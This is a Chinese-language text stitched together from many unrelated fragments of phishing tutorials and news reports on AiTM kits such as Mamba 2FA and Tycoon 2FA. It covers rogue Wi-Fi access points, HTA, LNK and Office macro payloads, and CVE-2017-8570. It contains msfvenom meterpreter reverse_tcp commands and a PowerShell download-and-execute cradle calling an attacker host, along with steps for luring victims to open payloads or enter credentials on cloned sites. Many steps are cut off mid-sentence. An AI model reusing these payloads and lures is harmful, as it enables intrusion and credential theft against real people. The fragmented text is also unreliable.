文章前言 本篇文章我们主要介绍常见的几种WIFI钓鱼方法与具体的实现 钓鱼实践 WiFi-Pumpkin 框架介绍 WiFi-Pumpkin是一款专用于无线环境渗透测试的框架,该工具可以伪造AP以完成中间人攻击 点击界面中的设置,设置钓鱼AP和密码,点击start即可开始 Step 3:点击start后我们可以看到钓鱼WiFi已经开启,连接钓鱼wifi在home界面可以看到当前连接的设备 Step 4:点击 查看帮助说明 常用命令: 简易钓鱼 Step 1:插入无线网卡 Step 2:执行以下命令创建AP #启动框架 wifipumpkin3 #设置无线网卡 set interface wlan0 # Wifiphisher还可用于针对连接的客户端发起受害者定制的网络钓鱼攻击,以获取凭据(例如,来自第三方登录页面或WPA/WPA2预共享密钥)或用恶意软件感染受害者站点。 框架安装 Step 1:下载框架 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher Step 2:安装依赖
钓鱼实践 Step 1:新增listener Step 2:选择"Attacks—>packages—>HTML application" Step 2:选择Powershell,之后点击"Generate 3:保存载荷 Step 4:之后以邮件或者社交软件(例如:QQ、微信)的方式发送给第三方用户,并诱导其进行点击操作 PS:本来想使用ChatGPT来生成一段关于诱导用户点开evil.hta文件的钓鱼话术 Step 5:成功返回会话 文末小结 本篇文章我们介绍了HTA钓鱼的基本流程,在实战中可以通过社交软件或者邮件的方式发送给受害者用户进行执行并获取权限
文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell 命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:80/a'))" Step 2: Shortcut.Save() Step 4:运行Al1ex.ps1,之后生成LNK文件 Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6:之后成功获得Shell 文末小结 基于LNK文件的钓鱼方式总体而言利用难度相对有点大 ,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~
Mamba 2FA钓鱼套件:现代中间人攻击(AiTM)运作机制解析Cyfirma研究团队发布报告,深入解析了名为“Mamba 2FA”的网络钓鱼即服务(PaaS)套件,该套件正被广泛用于针对Microsoft Mamba 2FA是一种高度自动化的攻击工具,能够实时拦截受害者的登录凭据和双因素认证(2FA/MFA)会话令牌。该套件自2024年以来持续活跃,并在近期进行了多次更新,以增强其逃避检测的能力。 针对此类威胁,专家建议组织强制实施基于FIDO2的硬件安全密钥或基于证书的身份验证,这些方法能有效抵御AiTM攻击。 同时,强烈推荐实施基于条件的访问策略,要求在访问敏感资源时使用合规设备,并启用防钓鱼的FIDO2安全密钥。此外,监控异常的文件共享活动和登录行为对于及时发现此类攻击至关重要。 Okta建议企业采用抗钓鱼的身份验证因素,如FIDO2/WebAuthn硬件密钥或基于设备的生物识别技术(如 Windows Hello, Touch ID),这些技术不依赖于可被窃取的一次性验证码。
并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本,黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码 社工钓鱼 for x64-based Systems Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32- ,之后成功弹出计算器 请求记录如下: 社工钓鱼 Step 1:使用Msfvenom生成恶意载荷 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST 4:使用MSF监听载荷 Step 5:启动服务托管载荷 Step 6:将恶意docx文件发送给受害者主机并诱导其打开 请求记录: 之后成功获取到Shell 文末小结 本篇文章对Office钓鱼进行了简单介绍 ,从上面可以发现在Office钓鱼中大部分情况都需要用户进行交互,例如:点击启用宏或者更新数据文档,这无疑会增加用户的怀疑,在社工钓鱼中药特别注意
2000 MicrosoftOffice 2003 MicrosoftOffice 2007 Service Pack 3 MicrosoftOffice 2010 Service Pack 2 payload windows/meterpreter/reverse_tcp set LHOST 192.168.174.129 set SRVPORT 9999 set URIPATH abc Step 2: A0 之后模拟用户打开Excel文件: 发现载荷成功执行: 钓鱼实践 这里使用MSF框架来实施攻击: use exploit/windows/misc/hta_server msf exploit 端成功上线: CVE-2017-8570 影响范围 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 8570 python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.174.129/logo.doc Step 2:
文章前言 本篇文章我们主要介绍Office在钓鱼中常见的应用与技巧 钓鱼实践 Office Macro 实验说明 Office宏,译自英文单词Macro,宏是微软公司为其OFFICE软件包设计的一个特殊功能 在本小节中,我们的目的是构造一个存在恶意宏代码的简历文件并将其投放给HR,通过钓鱼控制目标主机 实验步骤 Step 1:首先准备一份简历 Step 2:使用CS生成恶意宏代码 Step 3:弹出界面选择 raw=true Step 4:接下来将刚才解压生成的文件压缩回去: Step 5:将生成的压缩文件改名为后缀名为docx的文件 Step 5:将生成的恶意文件用邮箱钓鱼、qq或微信文件发送给受害者 之后重新打开 钓鱼实践 Step 1:使用msfvenom生成恶意载荷 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps2 Step 2:启动一个简易的web服务来托管shell.ps1 python2 -m SimpleHTTPServer
——(中)沃兹基索德 钓鱼式攻击 顾名思义,是一种如同钓鱼一样的攻击,是一种安逸的很的攻击方式。 搜狗百科是给出来比较容易理解的网络钓鱼的定义。 网络钓鱼 (Phishing)攻击者利用欺骗性的电子邮件和伪造的 Web 站点来进行网络诈骗活动,受骗者往往会泄露自己的私人资料,如信用卡号、银行卡账户、身份证号等内容。 可以看出,钓鱼攻击并不是一种完全随缘的攻击方法。关键在于是否成功伪装成了受害者信任的目标。
releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip unzip gophish-v0.11.0-linux-64bit.zip (2) 当然,在实际钓鱼中,不可能使用自己的qq邮箱去发送钓鱼邮件。 在Campaigns中,可以新建钓鱼事件,并选择编辑好的钓鱼邮件模板,钓鱼页面,通过配置好的发件邮箱,将钓鱼邮件发送给目标用户组内的所有用户。 当URL填写了http://主机IP/,并成功创建了当前的钓鱼事件后,Gophish会在主机的81端口部署当前钓鱼事件所选定的钓鱼页面,并在发送的钓鱼邮件里,将其中所有的超链接都替换成部署在81端口的钓鱼页面的 下面,我们使用 postfix+mailutils 在搭建 Gophish 的同一台 VPS 上开始搭建邮件服务器: (1)安装Postfix apt-get install postfix (2)
准备钓鱼套件https://github.com/r00tSe7en/Flash-Pop 美化版 https://github.com/hackxc/xss_flash 普通版 1.生成木马并捆绑flash 的安装程序 将木马与flash安装程序捆绑一起 木马解压位置:windows的自启动目录,这个百度钓鱼钓时间长就知道了。 5、修改一下version.js文件中的链接,为自己的钓鱼页面。(主要与XSS直接配合使用) 6、我比较喜欢用宝塔,我们新建一个站点,填好域名,改为静态后,将源码放入对应的网站目录下。 没有服务器和域名怎么办 http://www.webweb.com/ 香港云可以白嫖 7、下面开始钓鱼 如果你想利用XSS钓鱼 可以使用src标签 构造payload:<scriptsrc="http 我们找一个存在XSS的网站,在存在异常的参数位置,输入构造的payload,点击确定后,就会跳转到我们<em>钓鱼</em>页面。 8、对方下载安装后,成功上线。
Step 2——在3月7日之前,VIA一直属于小币种,没什么人关注,价格也比较低,大概是0.0015 RMB的单价,于是小黑持有了大量的VIA币,以便后续操作。 Step 2——批量将肉鸡们的比特币高价买入大量VIA币,这时之前挂的高价VIA币卖单被“抢购一空”,小黑31个账号上的VIA币顺利以100倍的价格换成比特币。 各种高大上的金融操作暂且不论,这次主要侃侃事发源头——Unicode钓鱼。 二、有哪些姿势“钓鱼” 先说下钓鱼,钓鱼就是三步走:准备诱饵,放到水里,坐等鱼上钩。 四、Unicode钓鱼模拟攻击 下面将通过仿冒 ape.com这个网站和其域名,来模拟Unicode钓鱼。 2、对于一些不得不访问,但是有所怀疑的网站,可以查网站域名的whois信息、排名情况(www.alexa.cn)、备案情况(工信部官网备案管理系统),一般钓鱼网站很难在这些信息上面面俱到。
文章前言 在社工钓鱼过程中,网站钓鱼是一种较为常见的钓鱼方式,比较常见的思路有以下几种: 第一种:通过购买服务器以及域名自我架设钓鱼网站,之后投放钓鱼网站页面给受害者并诱导其进行认证来窃取用户凭证,更有甚者可以在获取到网站的源码的情况下克隆一个类似的网站 Step 1:启动Setookit Select from the menu: 1) Social-Engineering Attacks //社会工程学攻击 2) Help, Credits, and About //帮助 99) Exit the Social-Engineer Toolkit //退出 Step 2: 2) Website Attack Vectors //网页攻击 3) Infectious Media Generator //传染媒介攻击(木马 返回上级 Step 4:选择"Credential Harvester Attack Method" 1) Web Templates //网站模板 2)
文件是从不安全的位置打开的 文件被文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDrive 存储中打开的 XLM / Macro 4.0 (excel宏钓鱼 但在某些情况下打开此类excel文件需手动点击启用宏才能正常钓鱼。 这一排用于执行命令,注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行 <PARAM name="Item<em>2</em>"
从意外中奖、网购退款、快递丢失、核酸异常……再到最近的周董NFT被盗,网络钓鱼虽老生常谈,但防不胜防。这些恶名昭著的网络钓鱼究竟是什么? 这正是最初阶段的网络钓鱼的手法,钓鱼者伪装身份骗取用户的信息。在获得了用户账户后,钓鱼者可以利用受害人的账户进行诈欺或者发送垃圾邮件。 网络钓鱼做嫁衣,向关键基础设施进行勒索攻击 最初的“钓鱼”,只是想通过盗窃的方式获取用户信息,以此牟利,但“盗窃”往往不会百分百奏效。为了获取更大的“利益”,网络钓鱼开始与勒索软件捆绑在一起。 尽管WannaCry勒索病毒并非使用钓鱼邮件,而是通过漏洞攻击蠕虫。但是这个案例给了网络钓鱼“新的启发”。 已知网络钓鱼的13种常见类型: 第1类:网络钓鱼:普通群发电子邮件 第2类:鱼叉式网络钓鱼:追求特定目标 第3类:捕鲸:追逐大家伙 第4类:商业电子邮件诈骗:冒充领导 第5类:克隆钓鱼:来自真实的复制
import requests user1 = 0 while 1<2: `user1 = user1 + 1 url = "http://vsssw222.6660606.cn/wap/login.php
在实际渗透中,我们常用office宏钓鱼来获取目标设备的权限。尤其是在红蓝对抗中,这使得office宏也是最佳社会工程攻击最有效的手段之一。 本文将为你演示在kali中如何配置office宏钓鱼。 注意:本文仅供学习和研究,请勿非法攻击。造成法律后果,和本文无关。 实验环境 kali2022 office word2019 生成宏 启动CS-攻击-office钓鱼 选择相应的监听后,点击生成。 service apache2 start 然后将模板文件放到/var/www/html 新建word模板文档 再次打开word,选择一个模板。
据Europol披露,Tycoon 2FA自2023年活跃以来,每月发送数千万封钓鱼邮件,影响了全球超过50万个组织。 Tycoon 2FA平台的技术架构与攻击机理Tycoon 2FA之所以能在短时间内造成如此巨大的破坏,根本原因在于其技术架构突破了传统钓鱼网站的局限。 在这种架构下,攻击者搭建的钓鱼站点不再是一个静态的页面克隆,而是一个位于受害者与真实目标服务之间的动态代理服务器。当受害者点击钓鱼链接时,请求首先到达Tycoon 2FA控制的代理服务器。 当受害者在钓鱼页面输入用户名和密码并提交时,Tycoon 2FA服务器立即将这些凭证转发给真实服务器。 反网络钓鱼技术专家芦笛强调,Tycoon 2FA这类平台的存在,实际上是将网络攻击的“最后一公里”难题解决了。
钓鱼邮件攻击【实验目的】通过Measploit生成msi命名为java的JDK,上传至DMZ区门户网站1的服务器,并诱使用域用户放下戒备,下载安装可信任文件,了解并掌握钓鱼邮件的原理。 【知识点】钓鱼邮件【实验原理】钓鱼邮件指利用伪装的电邮,欺骗收件人将账号、口令等信息回复给指定的接收者;或引导收件人连接到特制的网页,这些网页通常会伪装成和真实网站一样,如银行或理财的网页,令登录者信以为真 2.上传msi木马至可信任内网服务器。3.利用xiaowang用户编写钓鱼邮件发送给xiaozhang用户。4.模拟域用户xiaozhang下载安装执行木马。 2.Measploit生成msi木马回到攻击机2-Windows界面,在桌面右键弹出菜单,选择【在此处打开命令提示符】。 6.开启Meaploit监听返回shell选择拓扑图中左下方的【攻击机2-Windows】,按右键,在弹出的菜单中选择【控制台】,登录【攻击机2-Windows】界面。
wulaoban 社工 2020-06-30 Gophish 是一个功能强大的开源网络钓鱼框架,可以轻松测试组织的网络钓鱼风险,专为企业和渗透测试人员设计 1.下载与安装 官网:https://getgophish.com 编辑email template 这个是用来编辑钓鱼邮件的模板 我们可以导入钓鱼模板 ? landing pages设置钓鱼页面 用来获取用户名和密码 ? 可以看到发送成功,成功送达目标邮箱 还可以伪造任意x-mailer头 (如果不设置的话默认是gophish) x-mailer头表示邮件从哪个客户端发出来的 Campaign 这个就是用来发送钓鱼攻击的地方 可以看到邮件里面的链接都被替换成我们的钓鱼网站 ? 模拟用户输入账号密码 点击提交后跳转去正确的github页面 ? 可以看到平台已经接受到用户打开邮件 输入账号密码的时间了 ? ? 钓鱼成功!
网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。 2、存在XSS漏洞 ? 输入: 测试结果修改成功!查看下前端… ? 查看源代码-编辑后查看到没变动,XSS代码还是存在…说明存在XSS攻击 3、注册XSS平台 ? 四、利用XSS钓鱼 1、搭建Flash钓鱼页面 ? 在公网服务器搭建钓鱼页面,任何能访问互联网客户都可以访问该页面! 2、生成免杀后门 ? 利用Cobal Strike生成C#语言的shell… ? 6、成功XSS钓鱼 ? 执行安装! ? ? 成功在kali攻击机上的CS上线,可看到获取到了管理员电脑的权限!! 那么很多人都说flash都是经典的钓鱼漏洞了,全国警惕性都会高很多,那么我还是老话,提供的是思路,如果是一个破解软件,一个购买网站,一个利用虚荣心或者是贪小便宜的购物页面,等等进行钓鱼,进行各类的植入的话